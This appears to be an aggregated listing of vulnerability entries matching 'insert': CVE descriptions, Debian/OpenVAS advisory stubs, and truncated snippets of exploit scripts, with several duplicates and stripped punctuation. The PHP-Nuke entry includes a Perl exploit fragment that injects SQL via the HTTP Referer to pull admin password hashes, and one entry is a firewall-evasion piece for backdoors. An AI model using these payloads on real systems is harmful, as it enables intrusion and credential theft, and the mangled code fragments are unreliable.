Buffer overflow

Buffer overflow in Microsoft SQL Server 2005 SP1 and SP2, and 2005 Express Edition SP1 and SP2, allows remote authenticated users to execute arbitrary code via a crafted insert statement...

RunCMS 1.6.1 - msg_image SQL Injection

RunCMS 1.6.1 - msgimage SQL Injection !/usr/bin/python """ ================================================================================================= / | |\ \ / | / |/ | | |/ \ | | | |||| /| / /...

XSS vulnerabilities in insert image and link actions

In 2.7.x, the following URL's are vulnerable: - /users/insertlink.action - /users/insertlink-page-attachmentstab.action - /users/insertlink-page-uploadfile.action - /users/insertlink-draft-attachmentstab.action - /users/insertlink-draft-uploadfile.action - /users/doinsertimageinpage.action -...

XSS vulnerabilities in insert image and link actions

In 2.7.x, the following URL's are vulnerable: - /users/insertlink.action - /users/insertlink-page-attachmentstab.action - /users/insertlink-page-uploadfile.action - /users/insertlink-draft-attachmentstab.action - /users/insertlink-draft-uploadfile.action - /users/doinsertimageinpage.action -...

Debian Security Advisory DSA 707-1 (mysql)

The remote host is missing an update to mysql announced via advisory DSA 707-1. OpenVAS Vulnerability Test $Id: deb7071.nasl 6616 2017-07-07 12:10:49Z cfischer $ Description: Auto-generated from advisory DSA 707-1 Authors: Thomas Reinke Copyright: Copyright c 2007 E-Soft Inc...

SmallNuke 2.0.4 - Pass Recovery SQL Injection

SmallNuke 2.0.4 - Pass Recovery SQL Injection !/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x365' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text =...

SmallNuke 2.0.4 - Pass Recovery SQL Injection

!/usr/bin/perl use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindowtitle = "UnderWHAT?!" ; $mw-geometry '420x365' ; $mw-resizable0,0; $mw-Label-text = '', -font = 'Verdana 8',-foreground='red'-pack; $mw-Label-text = 'Smallnuke cms 'Tahoma 7...

DEBIAN-CVE-2007-4211

The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a 1 COPY or 2 APPEND command...

CVE-2007-4211

The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a 1 COPY or 2 APPEND command...

Default credentials

The Jedox Palo 1.5 client transmits the password in cleartext, which might allow remote attackers to obtain the password by sniffing the network, as demonstrated by starting Excel with the Palo plugin, opening a cube, and performing an Insert View...

CVE-2007-3581

The Jedox Palo 1.5 client transmits the password in cleartext, which might allow remote attackers to obtain the password by sniffing the network, as demonstrated by starting Excel with the Palo plugin, opening a cube, and performing an Insert View...

CVE-2007-2759

Multiple SQL injection vulnerabilities in the insert function in the ValuePreference class grid/ed/ValuePreference.java in Adempiere before 3.1.6 allow remote attackers to execute arbitrary SQL commands via the 1 mAttribute or 2 mValue parameter. NOTE: some of these details are obtained from thir...

TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit

Exploit for unknown platform in category web applications ==================================================== TaskDriver = 1.2 Login Bypass/SQL Injection Exploit ==================================================== !/usr/bin/perl -w TaskDriver = 1.2 Login Bypass/SQL Injection Exploit Discovered...

VP-ASP-SQL.txt

!!! WARNING !!! FOR EDUCATIONAL PURPOSES ONLY! Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, including without limitation an...

Five ways to evade firewall control system-vulnerability warning-the black bar safety net

As Trojan, Backdoor non-stop development, the firewall itself is also in constant development, which is a spear and shield and relationships, know how to escape through the firewall for the control of a system is very important. Due to the firewall of development, today, many firewalls are based ...

CVE-2006-7100

PHP remote file inclusion vulnerability in includes/functionsmoduser.php in phpBB Insert User 0.1.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

CVE-2006-7100

CVE-2006-7100 is a PHP remote file inclusion vulnerability in the phpBB Insert User extension (version 0.1.2 and earlier). The flaw resides in includes/functions_mod_user.php and allows remote attackers to execute arbitrary PHP code by supplying a URL in the phpbb_root_path parameter. Affected pr...

CVE-2006-7100

PHP remote file inclusion vulnerability in includes/functionsmoduser.php in phpBB Insert User 0.1.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

phpnuke80-blindsql.txt

------=Part7054910889112.1171994685834 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/...

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection !/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer;...